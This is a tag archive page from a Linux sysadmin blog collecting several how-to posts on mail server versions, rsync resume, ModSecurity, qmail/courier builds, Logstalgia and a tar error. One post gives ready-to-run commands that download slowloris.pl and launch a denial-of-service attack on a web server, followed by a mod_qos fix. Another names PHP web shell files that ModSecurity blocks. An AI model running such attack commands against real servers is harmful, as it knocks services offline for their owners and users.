Posts Tagged ‘gz’

How to check version of most used mail servers Postfix / Qmail / Exim / Sendmail

Wednesday, October 14th, 2020

Reading Time: 5minutes

How to check version of a Linux host's installed Mail server?

Most used mail servers Postfix / Qmail / Exim / Sendmail and usually you have to do a dpkg -l / rpm -qa or whatever package manager to get the package version. But sometimes the package is built to have a different naming convention from the actual installed MTA.

As recently I had to check on a Linux host what kind of version was the installed and used one to the SMTP, below is how to find conrete versions of Postfix / Qmail / Exim / Sendmail.
If none of the 4 is installed and something more cryptic like ssmtp is installed if another one is installed perhaps the best way would be to check with lsof -i :25 commandand see  what process has binded and listens on TCP port 25.

mail-server-lsof-linux-screenshot-qmail-vpopmail

 

 

1. How to check Postfix exact mail server version

mail-server-exim-check-lsof-screenshot

Once you can find Postfix is the Network listening MTA, you might think you can simply use postfix -v however, but no …
Unlike many other applications, Postfix has no -v or –versions switch. But you can get the version information easily by using the postconf command as shown below:

root@server :~# postconf mail_version

postfix-show-version-postconf-linux

Other approach is to dump all postfix configuration settings (this is useful to get more info on how postfix is configured) and explicitly grep for the version.
 How to check version of a Linux host's installeded webserver?

root@server :~# postconf -d | grep mail_version

 

2. How to check Exim MTA running version ?

root@exim-mail :/ # exim -bV
Exim version 4.72 #1 built 13-Jul-2010 21:54:55
Copyright (c) University of Cambridge, 1995 – 2007
Berkeley DB: Sleepycat Software: Berkeley DB 4.3.29: (September 19, 2009)
Support for: crypteq iconv() Perl OpenSSL move_frozen_messages Content_Scanning DKIM Old_Demime
Lookups: lsearch wildlsearch nwildlsearch iplsearch cdb dbm dbmnz
Authenticators: cram_md5 plaintext spa
Routers: accept dnslookup ipliteral manualroute queryprogram redirect
Transports: appendfile/maildir/mailstore/mbx autoreply lmtp pipe smtp
Size of off_t: 8
OpenSSL compile-time version: OpenSSL 0.9.8e-fips-rhel5 01 Jul 2008
OpenSSL runtime version: OpenSSL 0.9.8e-fips-rhel5 01 Jul 2008
Configuration file is /etc/exim.conf

how-to-get-exim-version-on-gnu-linux-screenshot


3. How to check Sendmail Mail Transport Agent exact Mail version ?

Though sendmail is rarely used this days and it usually works mostly on obsolete old scrap hosts
or in some old fashioned conservative organizations such as Banks and Payment services providers, you might need to invertise it, just like the configuration m4 format complexity with its annoying macros, getting the version is also not straight forward:

# sendmail -d0.4 -bv root | grep Version
Version 8.14.4

Above commands should be working on most Linux distributions such as Debian / Ubuntu / Fedora / CentOS / SuSE and other Linux derivatives
 

4. How to check Qmail MTA version?

This is a bit of complicated question, as Qmail's base has not been significantly changed for years.
The latest published qmail package is qmail-1.03.tar.gz.  1.03 was released in 1998, Qmail is famous for its unbreakable security. The author of qmail  Daniel J. Bernstein is famous for writting Qmail to make the work installation and configuration of SMTP simple as of the time of writting sendmail was the defacto standard and sendmail was hard to configure.
Also sendmail was famous for a set of Security holes that got a lot of Sendmail MTA's on the Net got hacked. Thus the QMAIL was written as a more security-aware mail transport agent.

In contrast to sendmail, qmail has a modular architecture composed of mutually untrusting components; for instance, the SMTP listener component of qmail runs with different credentials from the queue manager or the SMTP sender. qmail was also implemented with a security-aware replacement to the C standard library, and as a result has not been vulnerable to stack and heap overflows, format string attacks, or temporary file race conditions.

The core qmail package has not been updated for many years. New features were initially provided by third party patches, from which the most important at the time were brought together in a single meta-patch set called netqmail.

The current version of netqmail is at 1.06 netqmail-1.06.tar.gz as of year 2020.

One possible way to get some info about installed qmail or components is to use the documentation look up command apropos

qmail:~# apropos qmail


or check the manual or at worst check for the installation source files that the person that installed the qmail used 🙂

A fun fact about qmail few might know is D. Bernstein offered in 1997 a US$500 reward for the first person to publish a verifiable security hole in the latest version of the software, for many years till 2005 no hole was found security researcher Georgi Guninski found an integer overflow in qmail. On 64-bit platforms, in default configurations with sufficient virtual memory, the delivery of huge amounts of data to certain qmail components may allow remote code execution. Bernstein disputes that this is a practical attack, arguing that no real-world deployment of qmail would be susceptible. Configuration of resource limits for qmail components mitigates the vulnerability.

On November 1, 2007, Bernstein raised the reward to US$1000. At a slide presentation the following day, Bernstein stated that there were 4 "known bugs" in the ten-year-old qmail-1.03, none of which were "security holes." He characterized the bug found by Guninski as a "potential overflow of an unchecked counter." "Fortunately, counter growth was limited by memory and thus by configuration, but this was pure luck.

5. Quick way to check the type of Mail server installed on Debian based Linux that doesn't have telnet installed


As you know simple telnet localhost 25 or a simple ps -ef could reveal at most times general information on the installed server. However there is another way to do it using package manager. by using embedded bash shell type type command like so:
 

# type -p sendmail |
xargs dpkg -S

type-x-bash-command-to-find-out-email-server-version-on-linux

Another hacky way to check whether exim, postfix or sendmail SMTP is installed is with:

hipo@freak:~$ echo $(man sendmail)| grep "exim"|wc -l
1
hipo@freak:~$ echo $(man sendmail)| grep "postfix"|wc -l
0
hipo@freak:~$ echo $(man sendmail)| grep "sendmail"|wc -l
0

I guess there are nice hacks and ways to get versions, so if you're aware of any please share with me.
Enjoy !

Apache Denial of Service (DoS) attack with Slowris / Crashing Apache

Monday, February 1st, 2010

Reading Time: < 1minute

slowloris-denial-of-service-apache-logo
A friend of mine pointed me to a nice tool that is able to create a succesful denial of service to
most of the running web servers out there. The tools is called slowris
For any further information there is the following publication on ha.ckers.org about slowris
The original article of the friend of mine is located on his (mpetrov.net) person blog .
Unfortunately the post is in Bulgarian so it’s not a match for English speaking audience.
To launch the attack on Debian Linux all you need is:

# apt-get install libio-all-perl libio-socket-ssl-perl
# wget http://ha.ckers.org/slowloris/slowloris.pl
now issue the attack
# perl slowloris.pl -dns example.com -port 80 -timeout 1 -num 200 -cache

There you go the Apache server is not responding, no-traces of the DoS are left on the server,
the log file is completely clear of records!
;The fix to the attack comes with installing the not so popular Apache module: mod_qos
# cd /tmp/
# wget http://freefr.dl.sourceforge.net/project/mod-qos/mod-qos/9.7/mod_qos-9.7.tar.gz
# tar zxvf mod_qos-9.7.tar.gz
# cd mod_qos-9.7/apache2/
# apxs2 -i -c mod_qos.cThe module is installing to "/usr/lib/apache2/modules"All left is configuring the module
# cd /etc/apache2/mods-available/
#vim qos.load

Add the following in the file:

LoadModule qos_module /usr/lib/apache2/modules/mod_qos.so

Cheers! 🙂
I should express my gratitude to Martin Petrov's blog for the great info.

Resume sftp / scp cancelled (interrupted) network transfer – Continue (large) partially downloaded files on Linux / Windows

Thursday, April 23rd, 2015

Reading Time: 3minutes

resume-sftp-scp-cancelled-interrupted-file-transfer-download-upload-network-transfer-continue-large-partially-downloaded-file-howto-linux-windows
I've recentely have a task to transfer some huge Application server long time stored data (about 70GB) of data after being archived between an old Linux host server and a new one to where the new Tomcat Application (Linux) server will be installed to fit the increased sites accessibility (server hardware overload).

The two systems are into a a paranoid DMZ network and does not have access between each other via SSH / FTP / FTPs and even no Web Access on port (80 or SSL – 443) between the two hosts, so in order to move the data I had to use a third HOP station Windows (server) which have a huge SAN network attached storage of 150 TB (as a Mapped drive I:/).

On the Windows HOP station which is giving me access via Citrix Receiver to the DMZ-ed network I'm using mobaxterm so I have the basic UNIX commands such as sftp / scp already existing on the Windows system via it.
Thus to transfer the Chronos Tomcat application stored files .tar.gz archived I've sftp-ed into the Linux host and used get command to retrieve it, e.g.:

 

sftp UserName@Linux-server.net
Password:
Connected to Linux-server.
sftp> get Chronos_Application_23_04_2015.tar.gz

….


The Secured DMZ Network seemed to have a network shaper limiting my get / Secured SCP download to be at 2.5MBytes / sec, thus the overall file transfer seemed to require a lot of time about 08:30 hours to complete. As it was the middle of day about 13:00 and my work day ends at 18:00 (this meant I would be able to keep the file retrieval session for a maximum of 5 hrs) and thus file transfer would cancel when I logout of the HOP station (after 18:00). However I've already left the file transfer to continue for 2hrs and thus about 23% of file were retrieved, thus I wondered whether SCP / SFTP Protocol file downloads could be resumed. I've checked thoroughfully all the options within sftp (interactive SCP client) and the scp command manual itself however none of it doesn't have a way to do a resume option. Then I thought for a while what I can use to continue the interrupted download and I remembered good old rsync (versatile remote and local file copying tool) which I often use to create customer backup stragies has the ability to resume partially downloaded files I wondered whether this partially downloaded file resume could be done only if file transfer was only initiated through rsync itself and luckilyrsync is able to continue interrupted file transfers no matter what kind of HTTP / HTTPS / SCP / FTP program was used to start file retrievalrsync is able to continue cancelled / failed transfer due to network problems or user interaction activity), that turned even pretty easy to continue failed file transferdownload from where it was interrupted I had to change to directory where file is located:
 

cd /path/to/interrupted_file/


and issue command:
 

rsync -av –partial username@Linux-server.net:/path/to/file .


the –partial option is the one that does the file resume trick, -a option stands for –archive and turns on the archive mode; equals -rlptgoD (no -H,-A,-X) arguments and -v option shows a file transfer percantage status line and an avarage estimated time for transfer to complete, an easier to remember rsync resume is like so:
 

rsync -avP username@Linux-server.net:/path/to/file .
Password:
receiving incremental file list
chronos_application_23_04_2015.tar.gz
  4364009472   8%    2.41MB/s    5:37:34

To continue a failed file upload with rsync (e.g. if you used sftp put command and the upload transfer failed or have been cancalled:
 

rsync -avP chronos_application_23_04_2015.tar.gz username@Linux-server.net:/path/where_to/upload


Of course for the rsync resume to work remote Linux system had installed rsync (package), if rsync was not available on remote system this would have not work, so before using this method make sure remote Linux / Windows server has rsync installed. There is anrsync port also for Windows so to resume large Giga or Terabyte file archive downloads easily between two Windows hosts use cwRsync.

Tightening PHP Security on Apache 2.2 with ModSecurity2 on Debian Lenny Linux

Monday, April 26th, 2010

Reading Time: 4minutes

Tightening-PHP-Security-on-Apache-2.2-2.4-with-Apache-ModSecurity2
In this article you'll learn how I easily installed and configured the ModSecurity 2 on a Debian Lenny system.
First let me give you a few introductionary words to modsecurity, what is it and why it's a good idea to install and use it on your Apache Webserver.

ModSecurity is an Apache module that provides intrusion detection and prevention for web applications. It aims at shielding web applications from known and unknown attacks, such as SQL injection attacks, cross-site scripting, path traversal attacks, etc.

As you can see from ModSecurity’s description it’s a priceless module add on to Apache that is able to protect your PHP Applications and Apache server from a huge number of hacker attacks undertook against your Online Web Application or Webserver.
The only thing I don’t like about this module is that it is actually a 3rd party module (e.g. not officially part of Apache). Some time ago I remember there was even an exploit for one of the versions of the module.
So in some cases the ModSecurity could also pose a security risk, so beware!
However if you know what you'rre doing and you keep a regular track of security news on some major security websites, that shouldn’t be a concern for you.
Now let'ss proceed to the install of the ModSecurity module itself.
The install is a piece of cake on Debian though you'll be required to use the Debian Lenny backports

Here is the install of the module step by step:

1. First add the gpg key of the backports repository to your install

debian-server:~# gpg --keyserver pgp.mit.edu --recv-keys C514AF8E4BA401C3
# another possible way to add the repository as the website describes is through the command
debian-server:~# wget -O - http://backports.org/debian/archive.key | apt-key add -

2. Install the libapache-mod-security package from the backports Debian Lenny repository

debian-server~:~# apt-get -t lenny-backports install libapache2-mod-security2

Now as a last step of the install ModSeccurity install procedure you have to add some configuration directives to Apache and restart the server afterwards.

– Open your /etc/apache2/apache2.conf and place in it the following configurations


<IfModule mod_security2.c>
# Basic configuration options
SecRuleEngine On
SecRequestBodyAccess On
SecResponseBodyAccess Off

# Handling of file uploads
# TODO Choose a folder private to Apache.
# SecUploadDir /opt/apache-frontend/tmp/
SecUploadKeepFiles Off

# Debug log
SecDebugLog /var/log/apache2/modsec_debug.log
SecDebugLogLevel 0

# Serial audit log
SecAuditEngine RelevantOnly
SecAuditLogRelevantStatus ^5
SecAuditLogParts ABIFHZ
SecAuditLogType Serial
SecAuditLog /var/log/apache2/modsec_audit.log

# Maximum request body size we will
# accept for buffering
SecRequestBodyLimit 131072

# Store up to 128 KB in memory SecRequestBodyInMemoryLimit 131072
# Buffer response bodies of up to # 512 KB in length SecResponseBodyLimit 524288
</IfModule>

The ModSecurity2 module would be properly installed and configured as an Apache module.
3.All left is to restart Apache in order the new module and configurations to take effect.

debian-server:~# /etc/init.d/apache restart

Don’t forget to check the apache conf file for errors before restarting the Apache with the above command for that to happen issue the command:
debian-server:~# apache2ctl -t

If all is fine you should get as an output:

Syntax OK

4. Next to find out if the Apache ModSecurity2 module is enabled and already used by Apache as a mean of protection you,
you might want to check if the log files modsec_audit.log and modsec_debug.log files has grown and doesfeed a new content.
If they’re growing and you see messages concerning the operation of the ModSecurity2 Apache module that’s a sure sign all is fine.
5. As we have the Mod Security Apache module configured on our Debian Server, now we will need to apply some ModSecurityCore Rules .
In short ModSecurity Core Rules are some critical protection rules against attacks across almost every web architecture.
Another really neat thing about Core Rules (CRS) for ModSecurity is that they are written with a performance in mind.
So enabling this filter rules won’t be a too heavy load for your Apache server.

Here is how to install the core rules:

6. Download latest ModSecurity Code Rules

Download them from the following Code Rule url
At the time of writting this article the latest code rules are version modsecurity-crs_2.0.6.tar.gz

To download and install this rules issue some commands like:

debian-server:~# wget http://sourceforge.net/projects/mod-security/files/modsecurity-crs/0-CURRENT/modsecurity-crs_2.0.6.tar.gz/download
debian-server:~# cp -rpf ~/modsecurity-crs_2.0.6.tar.gz /etc/apache2/
debian-server:~# cd /etc/apache2/; tar -zxvvf modsecurity-crs_2.0.6.tar.gz

Besides physically storing the unarchived modsecirity-crs in your /etc/apache2 it’s also necessery to add to your Apache Ifmodule mod_security.c block of code the following two lines:

Include /etc/apache2/modsecurity-crs_2.0.6/*.conf
Include /etc/apache2/modsecurity-crs_2.0.6/base_rules/*.conf

Thus ultimately the configuration concerning ModSecurity in your Apache Server configuration should look like the following:

<IfModule mod_security2.c>
# Basic configuration options
SecRuleEngine On
SecRequestBodyAccess On
SecResponseBodyAccess Off

# Handling of file uploads
# TODO Choose a folder private to Apache.
# SecUploadDir /opt/apache-frontend/tmp/
SecUploadKeepFiles Off

# Debug log
SecDebugLog /var/log/apache2/modsec_debug.log
SecDebugLogLevel 0

# Serial audit log
SecAuditEngine RelevantOnly
SecAuditLogRelevantStatus ^5
SecAuditLogParts ABIFHZ
SecAuditLogType Serial
SecAuditLog /var/log/apache2/modsec_audit.log

# Maximum request body size we will
# accept for buffering
SecRequestBodyLimit 131072

# Store up to 128 KB in memory
SecRequestBodyInMemoryLimit 131072
SecRequestBodyInMemoryLimit 131072

# Buffer response bodies of up to
# 512 KB in length
SecResponseBodyLimit 524288
Include /etc/apache2/modsecurity-crs_2.0.6/*.conf
Include /etc/apache2/modsecurity-crs_2.0.6/base_rules/*.conf
</Ifmodule>

Once again you have to check if everything is fine with Apache configurations with:

debian-server:~# apache2ctl -t

If it’s showing once again an OK status. Then you’re ready to restart the Webserver.
debian-server:~# /etc/init.d/apache2 restart

One example goodness of setting up the ModSecurity + the Core rule sets are that after the above described installationis fully functional.

ModSecurity will be able to track if somebody tries to execute PHP Shell on your server .
ModSecurity will catch, log and block (forbid) requests to r99.txt, r59, safe0ver and possibly other hacked modifications of the php shell script

That’s it! Now Enjoy your tightened Apache Security and Hopefully catch the script kiddie trying to h4x0r yoU 🙂

Make QMAIL with vpopmail vchkpw, courier-authlib and courier-imap auth work without MySQL on Debian Linux qmailrocks Thibs install

Friday, September 28th, 2012

Reading Time: 5minutesHow to make qmail vpopmail vchkpw courier-authlib and courier-imap work storing mails on hard disk with qmailrocks Thibs install

Recently installed a new QMAIL, following mostly Thibs Qmailrocks install guide. I didn’t followed literally Thibs good guide, cause in his guide in few of the sections like Install Vpopmail he recommends using MySQL as a Backend to store Vpopmail email data and passwords; I prefer storing all vpopmail data on the file system as I believe it is much better especially for tiny QMAIL mail servers with less than 500 mail box accounts.

In this little article I will explain, how I made Vpopmail courier-authlib and courier-imap play nice together without storing data in SQL backend.

1. Compile vpopmail with file system data storage support

So here is how I managed to make vpopmail + courier-authlib + courier-imap, work well together:

First its necessery to compile Vpopmailin store all its users data and mail data on file system. For this in Thibs Vpopmail Intsall step compiled Vpopmail without support for MySQL, e.g. instead of using his pointed compile time ./configure, arguments I used:


# cd /downloads/vpopmail-5.4.33
# ./configure \
--enable-qmaildir=/var/qmail/ \
--enable-qmail-newu=/var/qmail/bin/qmail-newu \
--enable-qmail-inject=/var/qmail/bin/qmail-inject \
--enable-qmail-newmrh=/var/qmail/bin/qmail-newmrh \
--enable-tcprules-prog=/usr/bin/tcprules \
--enable-tcpserver-file=/etc/tcp.smtp \
--enable-clear-passwd \
--enable-many-domains \
--enable-qmail-ext \
--enable-logging=y \
--enable-auth-logging \
--enable-libdir=/usr/lib/ \
--disable-roaming-users \
--disable-passwd \
--enable-domainquotas \
--enable-roaming-users
....
....
# make && make install-strip
# cat > ~vpopmail/etc/vusagec.conf < < __EOF__
Server:
Disable = True;
__EOF__
echo 'export PATH=$PATH:/var/qmail/bin/:/home/vpopmail/bin/' > /etc/profile.d/extrapath.sh
chmod +x /etc/profile.d/extrapath.sh
source /etc/profile

A tiny shell script with all above options to compile (qmail) vpopmail without MySQL / PostgreSQL support is here

For other steps concerning creation of vpopmail/vchkpw – user/group just follow as Thibs suggests.

2. Compile and install courier-authlib-0.59.1

I’ve made mirror of courier-authlib.0.59.1.tar.gz cause this version includes support for vchkpw without mysql, its a pity newer versions of courier-authlib not any more have support for vpopmail to store its data directly on the hard disk.

Then on downlaod, compile && install courier-authlib:

Download authlib courier-authlib.0.59.1.tar.gz – (I made mirror of courier-authlib.0.59.1.tar.gz you can use my mirror or download it somewhere else from the net):


# cd /usr/local/src
# wget -q https://pc-freak.net/files/courier-authlib.0.59.1.tar.gz
# tar -zxvvf courier-authlib.0.59.1.tar.gz

Compile courier-authlib

# ./configure --prefix=/usr/local --exec-prefix=/usr/local --with-authvchkpw --without-authldap --without-authmysql --disable-root-check --with-ssl --with-authchangepwdir=/usr/local/libexec/authlib
....
# make && make install && make install-strip && make install-configure
....

On Debian Squeeze, this version of courier-authlib compiles fine, on Debian Lenny I use it too and there it is okay.

Unless above commands returns a compile error authlib will be installed inside /usr/local/libexec. If you get any errors it is most likely due to some missing header files. The error should be self explanatory enough, but just in case you have troubles to find what deb is necessery to install, please check here the complete list of installed packages I have on the host . In case of problems the quickest way (if on Debian Squeeze) is to install same packages, type:


# wget -q https://pc-freak.net/files/list_of_all_deb_necessery_installed_packages_for_authlib.txt
# for i in $(cat list_of_all_deb_necessery_installed_packages_for_authlib.txt |awk '{ print $2 }'); do
apt-get install --yes $i;
done

This is for the lazy ones though it might install you some packs you don’t like to have on your host, so just install it in case you know what you’re doing 🙂

Next step is to set proper configuration for courier-authdaemon.

3. Configure courier-authlib in /usr/local/etc/authlib

Again for the lazy ones I have prepared a good config which is working 100% with vpopmail configured to store mails on the file system, to install the “good” configs, fetch mine and put them in proper location, e.g.:


# cd /usr/local/etc
# wget -q https://pc-freak.net/files/authlib-config-for-qmail-with-hdd-directory-stored-userdata.tar.gz
# tar -zxvvf authlib-config-for-qmail-with-hdd-directory-stored-userdata.tar.gz
....

For those who prefer not to use my configuration as pointed above, here is what you will need to change manually in configs:

Edit /usr/local/etc/authlib/authdaemonrc and make sure there variable authmodulelist and authmodulelist and daemons=5
equals to:


authmodulelist="authvchkpw"


authmodulelistorig="authuserdb authpgsql authldap authmysql authcustom authvchkpw authpipe"


daemons=10

Bear in mind here the setting daemons, will set how many maximum parallel connections should be possible to authdaemond on new IMAP fetch mail user requests. Setting it to 10 will allow your mail server to support up to 10 users to paralelly check your mail for a tiny mail server this setting is okay if you expect higher number of parallel mail users raise the setting to some setting fitting your needs.

P.S. On some qmail installations this value has created weird problems and took me hours to debug the whole mess is caused by this setting, make sure you plan it now unless you don’t to loose some time in future.

4. Stop debian courier-authdaemon and start custom compiled one

Now all is ready and authdaemond can be started, but before that if you have installed courier-authlib as a debian package you need to stop it via init script and only when completely sure old default Debian courier-authdaemon is stopped launch the new installed one:


# /etc/init.d/courier-authdaemon stop
# s ax |grep -i authdaemond |grep -v grep
#
# /usr/local/sbin/authdaemond start
#

To make the newly custom source installed courier-authdaemon to load itself on system boot instead of the debian installed package


# dpkg -l |grep -i courier-authdaemon
ii courier-authdaemon 0.63.0-3 Courier authentication daemon

open /etc/init.d/courier-authdaemond, after line:


. /lib/lsb/init-functions

add


/usr/local/sbin/authdaemond start
exit 0

This will make the script exit once launches cmd /usr/local/sbin/authdaemond start

5. Compile and Install courier-imap

You will also have to install from courier-imap archive source, I have tested it and know Qmail + Vpopmail + Courier-Imap works for sure with version courier-imap-4.1.2.tar.bz2

As of time of writing this post courier-imap-4.11.0.tar.bz2 is the latest available for download from Courier-imap download site unfortunately this version requires higher version of >= courier-authlib-0.63

In order install courier-imap-4.1.2.tar.bz2


# cd /usr/local/src
# wget -q https://pc-freak.net/files/courier-imap-4.1.2.tar.bz2
# tar -jxvvf courier-imap-4.1.2.tar.bz2
...
# chown -R hipo:hipo courier-imap-4.1.2
# su hipo
$ cd courier-imap-4.1.2/
$ export CFLAGS="-DHAVE_OPEN_SMTP_RELAY -DHAVE_VLOGAUTH"
$ export COURIERAUTHCONFIG=/usr/local/bin/courierauthconfig
$ export CPPFLAGS=-I/usr/local/courier-authlib/include
$ ./configure --prefix=/usr/local/courier-imap --disable-root-check
...
$ exit
# make
...
# make install
...
# make install configure

It is recommended courier-imap to be compiled with non root username. In above code I use my username hipo, other people have to use any non-root user.

6. Set proper configuration and new init script for courier-imap

In /usr/lib/courier-imap, download following working configs (for convenience I’ve made tar with my configs):


# cd /usr/lib/courier-imap
# rm -rf etc
# wget -q https://pc-freak.net/files/courier-imap-config-etc.tar.gz

Then you will have to overwrite default courier-imap init script in /etc/init.d/courier-imap with another one to start the custom compiled one instead of debian default installed courier-imap


# mv /etc/init.d/courier-imap /root
# cd /etc/init.d
# wget -q https://pc-freak.net/files/debian-courier-imap
# mv debian-courier-imap courier-imap
# chmod +x courier-imap

This init script is written use /var/lock/subsys/courier-imap, so you will have to also create /var/lock/subsys/


# mkdir -p /var/lock/subsys

7. Start custom installed courier-imap

The start/stop init script of newly installed courier-imap is /usr/lib/courier-imap/libexec/imapd.rc


/usr/lib/courier-imap/libexec/imapd.rc start

Since a new /etc/init.dcourier-imap is installed too, it can be also used to control courier-imap start/stop.

Well thats should be enough for Courier-authlib and Courier-Authlib to communicate fine between each other and be able to connect and fetch e-mail stored in file system by vpopmail.

8. Test if Qmail IMAP proto finally works


# telnet localhost 143
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
* OK [CAPABILITY IMAP4rev1 UIDPLUS CHILDREN NAMESPACE THREAD=ORDEREDSUBJECT THREAD=REFERENCES SORT QUOTA IDLE AUTH=CRAM-MD5 ACL ACL2=UNION STARTTLS] Courier-IMAP ready. Copyright 1998-2011 Double Precision, Inc. See COPYING for distribution information.
a login username@mail-domain.com my-username-password
a OK LOGIN Ok.
a LIST "" "*"
* LIST (\HasNoChildren) "." "INBOX.Sent"
* LIST (\Marked \HasChildren) "." "INBOX"
* LIST (\HasNoChildren) "." "INBOX.Drafts"
* LIST (\HasNoChildren) "." "INBOX.Trash"
a OK LIST completed
a EXAMINE Inbox
* FLAGS (\Draft \Answered \Flagged \Deleted \Seen \Recent)
* OK [PERMANENTFLAGS ()] No permanent flags permitted
* 6683 EXISTS
* 471 RECENT
* OK [UIDVALIDITY 1272460837] Ok
* OK [MYRIGHTS "acdilrsw"] ACL
a OK [READ-ONLY] Ok
* 1 FETCH (BODY[] {2619}
Return-Path:
Delivered-To: hipo@my-domain-name.com
Received: (qmail 22304 invoked by uid 1048); 24 Apr 2012 14:49:49 -0000
Received: from unknown (HELO localhost) (127.0.0.1)
by mail.my-domain-name.com with SMTP; 24 Apr 2012 14:49:49 -0000
Delivered-To: hipo@my-domain-name.com
Received: from localhost [127.0.0.1]
......
......

That’s all it works. Enjoy 🙂

Linux: List last 10 (newest) and 10 oldest modified files in a directory with ls

Tuesday, April 8th, 2014

Reading Time: < 1minute

An useful thing on GNU / Linux sometimes is to list last or oldest modified files in directory.

Lets say you want to list last 10 modified files with ls from today / yesterday. Here is how:
 

ls -1t | head -10
my.cnf
wordperss_enabled_plugins.txt
newcerts/
mysql-hipo_pcfreakbiz.dump
NewArchive-Jan-10-15.zip
hipo_pcfreakbiz-mysqldb-any-out-1389361234.tgz
Tisho_Snimki/
wordpress/
wp-cron.php?doing_wp_cron=1.1
wp-cron.php

 

To list 10 oldest modified files on Linux:

 

ls -1t | tail -10
    my.cnf
    pcfreak_sql-15_10_05_2012
    mysql-tuning-primer*
    tuning-primer.sh*
    system-administration-services.html
    blog_backup_15_07_2012.tar.gz
    www-files/
    dump.sql
    courier-imap*
    djbdns-1.05.tar.gz


Cheers 😉

Fun with Apache / Nginx Webserver log – Visualize webserver access log in real time

Friday, July 18th, 2014

Reading Time: 4minutes

visualize-graphically-web-server-access-log-logstalgia-nginx-apache-log-visualize-in-gnu-linux-and-windows
If you're working in a hosting company and looking for a graphical way to Visualize access to your Linux webservers – (Apache, Nginx, Lighttpd) you will be happy to learn about Logstalgia's existence. Logstalgia is very useful if you need to convince your Boss / company clients that the webservers are exceeding the CPU / Memory hardware limits physically servers can handle. Even if you don't have to convince anyone of anything logstalgia is cool to run if you want to impress a friend and show off your 1337 4Dm!N Sk!11Z🙂 Nostalgia is much more pleasent way to keep an eye on your Webserver log files in real time better than (tail -f)

The graphical output of nostalgia is a pong-like battle game between webserver and never ending chain of web requests.

This is the official website description of Logstalgia:
 

Logstalgia is a website traffic visualization that replays web-server access logs as a pong-like battle between the web server and an never ending torrent of requests. Requests appear as colored balls (the same color as the host) which travel across the screen to arrive at the requested location. Successful requests are hit by the paddle while unsuccessful ones (eg 404 – File Not Found) are missed and pass through. The paths of requests are summarized within the available space by identifying common path prefixes. Related paths are grouped together under headings. For instance, by default paths ending in png, gif or jpg are grouped under the heading Images. Paths that don’t match any of the specified groups are lumped together under a Miscellaneous section.


To install Logstalgia on Debian / Ubuntu Linux there is a native package, so to install it run the usual:

apt-get --yes install logstalgia

Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
  logstalgia
0 upgraded, 1 newly installed, 0 to remove and 4 not upgraded.
Need to get 161 kB of archives.
After this operation, 1,102 kB of additional disk space will be used.
Get:1 http://mirrors.kernel.org/debian/ stable/main logstalgia amd64 1.0.0-1+b1 [161 kB]
Fetched 161 kB in 2s (73.9 kB/s)
Selecting previously deselected package logstalgia.
(Reading database ... 338532 files and directories currently installed.)
Unpacking logstalgia (from .../logstalgia_1.0.0-1+b1_amd64.deb) ...
Processing triggers for man-db ...
Setting up logstalgia (1.0.0-1+b1) ...


Logstalgia is easily installable from source code on non-Debian Linux distributions too, to install it on any non-debian Linux distrubution do:

cd /usr/local/src/ wget https://logstalgia.googlecode.com/files/logstalgia-1.0.5.tar.gz
 

–2014-07-18 13:53:23–  https://logstalgia.googlecode.com/files/logstalgia-1.0.3.tar.gz
Resolving logstalgia.googlecode.com… 74.125.206.82, 2a00:1450:400c:c04::52
Connecting to logstalgia.googlecode.com|74.125.206.82|:443… connected.
HTTP request sent, awaiting response… 200 OK
Length: 841822 (822K) [application/x-gzip]
Saving to: `logstalgia-1.0.3.tar.gz'

100%[=================================>] 841,822     1.25M/s   in 0.6s

2014-07-18 13:53:24 (1.25 MB/s) – `logstalgia-1.0.3.tar.gz' saved [841822/841822]

Untar the archive with:
 

tar -zxvf logstalgia-1.0.5.tar.gz

Compile and install it:

cd logstalgia
./configure
make
make install

 

How to use LogStalgia?

Syntax is pretty straight forward just pass the Nginx / Apache

Process Debian Linux Apache logs:

logstalgia /var/log/apache2/access.log


Process CentoS, Redhat etc. RPM based logs:

logstalgia /var/log/httpd/access.log
To process webserver log in real time with logstalgia:

tail -f /var/log/httpd/access_log | logstalgia -

To make logstalgia visualize log output you will need to have access to server physical console screen. As physical access is not possible on most dedicated servers – already colocated in some Datacenter. You can also use a local Linux PC / notebook installed with nostalgia to process webserver access logs remotely like so:

logstalgia-visualize-your-apache-nginx-lighttpd-logs-graphically-in-x-and-console-locally-and-remotely

ssh hipo@pc-freak.net tail -f /var/log/apache2/access.log | logstalgia --sync

Note! If you get an empty output from logstalgia, this is because of permission issues, in this example my user hipo is added in www-data Apache group – if you want to add your user to have access like me, issue on remote ssh server):
 

addgroup hipo www-data


Alterantively you can login with ssh with root, e.g. ssh root@pc-freak.net

If you're having a GNOME / KDE X environment on the Linux machine from which you're ssh-ing Logstalgia will visualize Webserver access.log requests inside a new X Window otherwise if you're on a Linux with just a console with no Xserver graphics it will visualize graphically web log statistics using console svgalib .

 

If you're planning to save output from nostalgia visualization screen for later use – lets say you have to present to your CEO statistics about all your servers  Webservers logs you can save nostalgia produced video in .ppm (netpbm) format.

Whether you have physical console access to the server:

logstalgia -1280x720 --output-ppm-stream output.ppm /var/log/httpd/access.log

Or if you just a have a PC with Linux and you want to save visualized content of access.log remotely:

ssh hipo@pc-freak.net tail -f /var/log/nginx/pc-freak-access.log | logstalgia -1280x720 --output-ppm-stream --sync output.ppm

 

ssh user@server1.cyberciti.biz tail -f /var/log/nginx/www.cyberciti.biz_access.log | logstalgia -1280x720 --output-ppm-stream --sync output.ppm

To make produced .ppm later usable you can use ffmpeg to convert to .mp4:

ffmpeg -y -r 60 -f image2pipe -vcodec ppm -i output.ppm -vcodec libx264 -preset ultrafast -pix_fmt yuv420p -crf 1 -threads 0 -bf 0 nginx.server.log.mp4

Then to play the videos use any video player, I usually use vlc and mplayer.

For complete info on Nostalgia – website access log visualizercheck home page on googlecode

If you're lazy to install Logstalgia, here is Youtube video made from its output:

Enjoy 🙂

Fix “tar: Error exit delayed from previous errors” and its cause and solution

Monday, August 18th, 2014

Reading Time: 2minutes

fix-solve-tar-error-delayed-exit-from-previous-errors-tarball-error

tar: Error exit delayed from previous errors

error is a very common error encountered when creating archives (or backing up server configurations / websites / sql binary data). The error is quite unexplanatory and whenever creating files verbose in order to see the files added to archve in "real time" with lets say:

tar -czvf /tmp/filename_backup_date-of-backup.tar.gz /home/websites /home/sql


